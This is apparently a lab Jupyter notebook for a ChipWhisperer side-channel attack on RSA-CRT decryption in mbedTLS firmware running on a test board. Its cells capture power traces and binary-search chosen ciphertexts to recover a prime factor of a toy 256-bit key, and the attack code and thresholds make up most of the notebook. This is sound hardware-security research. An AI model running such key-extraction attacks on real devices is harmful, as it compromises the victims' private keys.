### Setup

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
CRYPTO_TARGET = 'MBEDTLS'

In [ ]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../../../hardware/victims/firmware/simpleserial-rsa
#make clean PLATFORM=$1 CRYPTO_TARGET=$2
make PLATFORM=$1 CRYPTO_TARGET=$2 

In [ ]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

In [ ]:
fw_path = '../../../hardware/victims/firmware/simpleserial-rsa/simpleserial-rsa-CWLITEXMEGA.hex'

In [ ]:
cw.program_target(scope, prog, fw_path)

In [ ]:
import numpy as np
import time 
import matplotlib.pylab as plt
import matplotlib

In [ ]:
e = 65537
n = 52270967183635299110959169812507925945033892524340745668343932985606720718177

In [ ]:
p = 267882443680857975761967467408531606417
q = 195126513202591094461357355156264195281

### find numbers

In [ ]:
212676479325586539664609129644855132160
195126513202591094463540923714081128448

In [ ]:
print( (195126513202591094463540923714081128448 % p) - (195126513202591094463540923714081128448 % q))

In [ ]:
print( (25 % p) - (25 % q))

In [ ]:
def find_valid_msgs(p, q, e, n, max_msg):
    valid_msgs = []
    for x in range(195126513202591094463540923714081128440, max_msg + 1):  # Iterate through possible msg values
        #x = pow(msg, e, n)  # Compute (msg^e) % n efficiently using modular exponentiation
        if (x % p) - (x % q) < 0:  # Check the condition
            valid_msgs.append(x)
    return valid_msgs

# Parameters
max_msg = 195126513202591094463540923714081128450  # Set a range for msg (you can adjust this range)

# Find and display valid messages
valid_msgs = find_valid_msgs(p, q, e, n, max_msg)
print(f"Valid messages: {valid_msgs}")

In [ ]:
def find_valid_msgs(p, q, e, n, max_msg):
    valid_msgs = []
    for x in range(1, max_msg + 1):  # Iterate through possible msg values
        #x = pow(msg, e, n)  # Compute (msg^e) % n efficiently using modular exponentiation
        if (x % p) - (x % q) > 0:  # Check the condition
            valid_msgs.append(msg)
    return valid_msgs

# Parameters
max_msg = 1000  # Set a range for msg (you can adjust this range)

# Find and display valid messages
valid_msgs = find_valid_msgs(p, q, e, n, max_msg)
print(f"Valid messages: {valid_msgs}")

In [ ]:
def find_valid_msgs(p, q, e, n, max_msg):
    valid_msgs = []
    for x in range(1, max_msg + 1):  # Iterate through possible msg values
        #x = pow(msg, e, n)  # Compute (msg^e) % n efficiently using modular exponentiation
        if (x % p) - (x % q) == 0:  # Check the condition
            valid_msgs.append(msg)
    return valid_msgs

# Parameters
max_msg = 1000  # Set a range for msg (you can adjust this range)

# Find and display valid messages
valid_msgs = find_valid_msgs(p, q, e, n, max_msg)
print(f"Valid messages: {valid_msgs}")

### capture trace setup

In [ ]:
scope.clock.adc_src = "clkgen_x1"
scope.adc.samples = 1500

#scope.adc.timeout = 50

In [ ]:
import time

def capture_RSA_trace(scope, target, text):
    scope.arm()
    target.simpleserial_write('t', text)

    # get debug output, nötig?
    #rec_str = target.read(1000, timeout=2000)
    #received_str = rec_str.replace("\\r\\n", "\n")
    #print(received_str)
    
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    time.sleep(2)
    output = target.read(timeout=20)
    print('first: ', output.replace("\\r\\n\\z00", "\n"))
    
    target.write("1\n")
    time.sleep(0.2)
    #output += target.read(timeout=10)
    output = target.read(timeout=10) 
    print('next 48 bytes: ', output.replace("r", "").replace("\nz00","").replace("\n",""))

    target.write("2\n")
    time.sleep(0.2)
    #output += target.read(timeout=10)
    output = target.read(timeout=10) 
    print('last bytes: ', output.replace("r", "").replace("\nz00","").replace("\n",""))


    #newout = output.replace("r", "").replace("\nz00","").replace("\n","")
    #print('output: ', newout)

    if SCOPETYPE == "OPENADC":
        print('#samples: ', scope.adc.trig_count)
    
    target.simpleserial_wait_ack() #!!!!
    return scope.get_last_trace()

In [ ]:
import time

def capture_RSA_trace(scope, target, text):
    target.flush()
    scope.arm()
    target.simpleserial_write('t', text)

    # get debug output, nötig?
    rec_str = target.read(2000, timeout=25000)
    received_str = rec_str.replace("\\r\\n", "\n")
    print(received_str)
    
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    #time.sleep(2)
    #output = target.read(3000, timeout=30000)
    #print(output.replace("\\r\\n\\z00", "\n"))

    #if SCOPETYPE == "OPENADC":
    #    print('#samples: ', scope.adc.trig_count)
    
    target.simpleserial_wait_ack() #!!!!
    return scope.get_last_trace()

### test numbers for 16 Byte prim numbers

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 1
c = (msg ** e) % n

msg2_d1 = c.to_bytes(32,'big')

print(c, msg2_d1, type(msg2_d1))

trace2_d1 = capture_RSA_trace(scope, target, msg2_d1)
plt.figure()
plt.plot(trace2_d1, 'r')



In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 54
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace1 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace1, 'r')

#43 39 38 38 34 38 33 30 33 44 30 36 30 39 42 44 33 39 30 42 46 45 45 42 45 35 45 46 34 42 39 31 00 
#-> C9 88 48 30 34 06 09 bd 39 0b fe eb e5 ef 4b 91 -> p

#n
#37 32 39 45 33 31 31 39 38 30 45 31 30 41 34 35 41 45 33 39 42 42 34 38 30 34 35 43 43 46 30 30
# 72 9e 31 19 80 e1 0a 45 ae 39 bb 48 04 5c cf 00

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 8569
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace1 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace1, 'r')

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 10 #A
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace2 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace2, 'r')

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 1007 #3EF
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace2 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace2, 'r')

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 57344
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace2 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace2, 'r')

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 61440
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace2 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace2, 'r')


In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 589 #245D 
c = (msg ** e) % n

msg2_d1 = c.to_bytes(32,'big')

print(c, msg2_d1, type(msg2_d1), hex(c))

trace2_d1 = capture_RSA_trace(scope, target, msg2_d1)
plt.figure()
plt.plot(trace2_d1, 'r')


### fehlermeldung: 
r35350000
r3400000000000000
rE571FE33
r2D31360000000000 -> -16 -> MBEDTLS_ERR_MPI_ALLOC_FAILED  
r00
r3300360000000000
r010001
r2D31360000000000
r00
r3230000000000000
r404DB6D327F06BA2EAD56A2E42722CB0881BBF0AF23943D201209FB88DCB1F01
r2D31360000000000
r00
r3130000000000000
rC98848303D0609BD390BFEEBE5EF4B91
r2D31360000000000
r00
r3130000000000000
r92CBFFDD66DFBE4FC1B267F7389C14D1
r2D31360000000000
r00
r3130000000000000
rC1136AADA4591B8D8890E08A9A4096B1
r2D31360000000000
r00
r3130000000000000
r8B4CC63A64DAC10F923127F33366F961
r2D31360000000000
r00
r3130000000000000
r729E311980E10A45AE39BB48045CCF00
r2D31360000000000
r00
r00
r00
r00
r00
r00
r00
r00
r00
z80

(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:730) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:730) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 08

Timeout happened during acquisition
#samples:  0


### Key Reconstuction

* find plaintexts x_1 and x_2 mit diff(x_1) = 0 und diff(x_2) = 1.
* mittels binäre suche: finde x mit diff(x-1) = 0 und diff(x) = 1 -> x ist Vielfaches von p 
* ggt(x, n) = p
* x^e mod n

### Algorithmus

Reconstruction of p when its bitlength is half bitlength of n
INPUT: modulus n with the bitlength t, public exponent e.
OUTPUT: prime p such that p divides n.

t = bitlenght von n 
p,q haben bitlänge t/2

x = 2 ** (t/2)
m = x/2 

In [ ]:
# 16 Byte Primzahlen 

t = 256

# x= 2 ** (t/2) 
# m = x/2 

x = 2**128
m = x//2
l = 0

print(x, m, l)

In [ ]:

 
plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)


    

In [ ]:
x = 196725743376167549189763444921490997248
m = 194067287384597717443955830800930308096
l = 191408831393027885698148216680369618944

plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)


    

In [ ]:
x = 195126515943738822280176052052091207680
m = 195123919795309554866361786803926597632
l = 195121323646880287452547521555761987584

plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)


    

In [ ]:
x = 195126515943738822280176052052091207680
m = 195126475378919614976835204157588635648
l = 195126434814100407673494356263086063616

plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)


    

In [ ]:
x = 195126513408437621823717249058684796928
m = 195126512140787021595487847561981591552
l = 195126510873136421367258446065278386176

plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)


    

In [ ]:
x = 195126513202939575302344123425430175744
m = 195126513202630090292522778356705394688
l = 195126513202320605282701433287980613632

plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)
plt.plot(trace_, 'r')


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)


    

In [ ]:
x = 195126513202591102434840206565821120512
m = 195126513202590951319112754737174282240
l = 195126513202590800203385302908527443968

plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)
plt.plot(trace_, 'r')


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        plt.plot(trace, 'g')
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        plt.plot(trace, 'b')
        x = m
        
    m = (l + x)//2
    
    

print (x)


    

In [ ]:
x = 195126513202591102434840206565821120512
m = 195126513202591092990107240826530693120
l = 195126513202591083545374275087240265728

plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)
plt.plot(trace_, 'r')


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        plt.plot(trace, 'g')
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        plt.plot(trace, 'b')
        x = m
        
    m = (l + x)//2
    
    

print (x)


    

In [ ]:
x = 195126513202591094465846766723294822400
m = 195126513202591094461235080704867434496
l = 195126513202591094456623394686440046592

plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)
plt.plot(trace_, 'r')


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        plt.plot(trace, 'g')
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        plt.plot(trace, 'b')
        x = m
        
    m = (l + x)//2
    
    

print (x)


    

In [ ]:
x = 195126513202591094461361181494433808384
m = 195126513202591094461352174295179067392
l = 195126513202591094461343167095924326400

plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)
plt.plot(trace_, 'r')


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        plt.plot(trace, 'g')
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        plt.plot(trace, 'b')
        x = m
        
    m = (l + x)//2
    
    

print (x)


    

In [ ]:
x = 195126513202591094461357355193969147904
m = 195126513202591094461357350795922636800
l = 195126513202591094461357346397876125696

plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)
plt.plot(trace_, 'r')


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        plt.plot(trace, 'g')
        l = m
    elif diff < 100: #unterscheidet sich von ref_trace -> diff(m) = 1
        plt.plot(trace, 'b')
        x = m
    else : 
        plt.plot(trace, 'y')
        continue
        
    m = (l + x)//2
    
    

print (x)


    

In [ ]:
x = 195126513202591094461357355193969147904
m = 195126513202591094461357355159609409536
l = 195126513202591094461357355125249671168

plt.figure()

ref_trace_msg_ = 8569 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)
plt.plot(trace_, 'r')


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        plt.plot(trace, 'g')
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        plt.plot(trace, 'b')
        x = m

    m = (l + x)//2
    
    

print (x)


    

p = 14091828191315287507
q = 6353019252147394247
N = 89525655797379415138998373505682772229

q = N // p
euler = (p-1)*(q-1)

-> d durch erweiterter euklidischer algo 

In [ ]:
scope.dis()
target.dis()